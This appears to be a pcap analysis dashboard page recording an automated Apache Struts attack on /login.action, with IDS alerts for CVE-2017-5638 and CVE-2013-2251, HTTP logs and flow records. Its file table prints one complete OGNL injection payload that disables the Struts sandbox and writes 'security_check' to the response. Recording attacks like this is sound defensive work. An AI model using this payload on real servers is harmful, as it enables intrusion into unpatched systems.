58.218.56.81.pcap

MD59edd55259d07c90621187deb2c71276f
Submission Date2018-07-15 20:25:52
Tagsrce cve-2013-2251
Alert 7
Showing 1-7 of 7 items.
#
TimestampSrc IpDest IpAlert SignatureP
1
2018-07-13T17:27:23.400294-070058.218.56.81172.17.0.2ET WEB_SPECIFIC_APPS Possible Apache Struts OGNL Expression Injection (CVE-2017-5638) (Content-Disposition) M1*
2
2018-07-13T17:27:33.499848-070058.218.56.81172.17.0.2ET WEB_SPECIFIC_APPS Possible Apache Struts OGNL Expression Injection (CVE-2017-5638) M2*
3
2018-07-13T17:27:33.499848-070058.218.56.81172.17.0.2ET WEB_SPECIFIC_APPS Possible Apache Struts OGNL Expression Injection (CVE-2017-5638) M3*
4
2018-07-13T17:27:33.406106-070058.218.56.81172.17.0.2ET WEB_SPECIFIC_APPS Possible Apache Struts OGNL Expression Injection (CVE-2017-5638) M2*
5
2018-07-13T17:27:33.406106-070058.218.56.81172.17.0.2ET WEB_SPECIFIC_APPS Possible Apache Struts OGNL Expression Injection (CVE-2017-5638) M3*
6
2018-07-13T17:27:33.668000-070058.218.56.81172.17.0.2ET WEB_SERVER Possible Apache Struts OGNL Command Execution CVE-2013-2251 redirect*
7
2018-07-13T17:27:33.590104-070058.218.56.81172.17.0.2ET WEB_SERVER Possible Apache Struts OGNL Command Execution CVE-2013-2251 redirect*
DNS 0
#
TimestampSrc IpDest IpDns TypeResource Record NameResource Record TypeResource Data
No results found.
TLS 0
#
TimestampSource IPDestination IPTLS VersionServer Name Indication
No results found.
TFTP 0
#TimestampSrc IpDest IpTftp PacketTftp FileTftp Mode
No results found.
HTTP 11
Showing 1-11 of 11 items.
#
TimestampSourceHostnamePortMethodURLStatus
1
2018-07-13T17:27:34.167782-070058.218.56.81192.144.141.6880GET/login.action/404
2
2018-07-13T17:27:33.499848-070058.218.56.81192.144.141.6880GET/login.action/404
3
2018-07-13T17:27:33.668000-070058.218.56.81192.144.141.6880GET/login.action/404
4
2018-07-13T17:27:33.933671-070058.218.56.81192.144.141.6880GET/login.action/404
5
2018-07-13T17:27:34.349604-070058.218.56.81192.144.141.6880GET/login.action/404
6
2018-07-13T17:27:33.668172-070058.218.56.81192.144.141.6880POST/login.action301
7
2018-07-13T17:27:33.668172-070058.218.56.81192.144.141.6880POST/login.action301
8
2018-07-13T17:27:33.668172-070058.218.56.81192.144.141.6880POST/login.action301
9
2018-07-13T17:27:33.668172-070058.218.56.81192.144.141.6880POST/login.action301
10
2018-07-13T17:27:33.668172-070058.218.56.81192.144.141.6880POST/login.action301
11
2018-07-13T17:27:33.668172-070058.218.56.81192.144.141.6880POST/login.action(not set)
SMB 0
#
TimestampSrc IpDest IpSMB DialectCommandSessionTree
No results found.
SMTP 0
#
TimestampSourceDestinationEmail FromEmail ToSubject
No results found.
Flow 11
Showing 1-11 of 11 items.
#
TimestampFlow IdEvent TypeSourceSource PortDestinationDestination PortProtocolHost
1
2018-07-13T17:27:33.668172-07001698974229992955flow58.218.56.811507172.17.0.280TCPpcapanalyzer
2
2018-07-13T17:27:33.668172-0700616262366781150flow58.218.56.811298172.17.0.280TCPpcapanalyzer
3
2018-07-13T17:27:33.668172-07001465587854550950flow58.218.56.811438172.17.0.280TCPpcapanalyzer
4
2018-07-13T17:27:33.668172-0700777265658282936flow58.218.56.811317172.17.0.280TCPpcapanalyzer
5
2018-07-13T17:27:33.668172-07001765655744717327flow58.218.56.811337172.17.0.280TCPpcapanalyzer
6
2018-07-13T17:27:33.668172-07001771423885836707flow58.218.56.811468172.17.0.280TCPpcapanalyzer
7
2018-07-13T17:27:33.668172-07001772946451688112flow58.218.56.811411172.17.0.280TCPpcapanalyzer
8
2018-07-13T17:27:33.668172-0700820477324240916flow58.218.56.811379172.17.0.280TCPpcapanalyzer
9
2018-07-13T17:27:33.668172-07001671353295349632flow58.218.56.811486172.17.0.280TCPpcapanalyzer
10
2018-07-13T17:27:33.668172-0700124396269599595flow58.218.56.811355172.17.0.280TCPpcapanalyzer
11
2018-07-13T17:27:33.668172-07001534144121250173flow58.218.56.814268172.17.0.280TCPpcapanalyzer
File 10
Showing 1-10 of 10 items.
#
TimestampSourceDestinationFile NameFile MagicFile Size
1
2018-07-13T17:27:13.333679-070058.218.56.81172.17.0.2%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType('text/html;charset=UTF-8')).(#res.getWriter().print('security_')).(#res.getWriter().print('check')).(#res.getWriter().flush()).(#res.getWriter().close())}\0bvery short file (no magic)1
2
2018-07-13T17:27:33.758173-070058.218.56.81172.17.0.2/login.actionASCII text, with very long lines, with no line terminators484
3
2018-07-13T17:27:34.023076-070058.218.56.81172.17.0.2/login.actionASCII text, with very long lines, with no line terminators425
4
2018-07-13T17:27:34.167782-0700172.17.0.258.218.56.81/login.action/XML 1.0 document, ASCII text340
5
2018-07-13T17:27:33.499848-0700172.17.0.258.218.56.81/login.action/XML 1.0 document, ASCII text340
6
2018-07-13T17:27:33.532855-070058.218.56.81172.17.0.2/login.actionASCII text, with very long lines, with no line terminators471
7
2018-07-13T17:27:33.668000-0700172.17.0.258.218.56.81/login.action/XML 1.0 document, ASCII text340
8
2018-07-13T17:27:33.933671-0700172.17.0.258.218.56.81/login.action/XML 1.0 document, ASCII text340
9
2018-07-13T17:27:34.206898-070058.218.56.81172.17.0.2/login.actionASCII text, with very long lines, with no line terminators436
10
2018-07-13T17:27:34.349604-0700172.17.0.258.218.56.81/login.action/XML 1.0 document, ASCII text340

Comments

Update Download PCAP Delete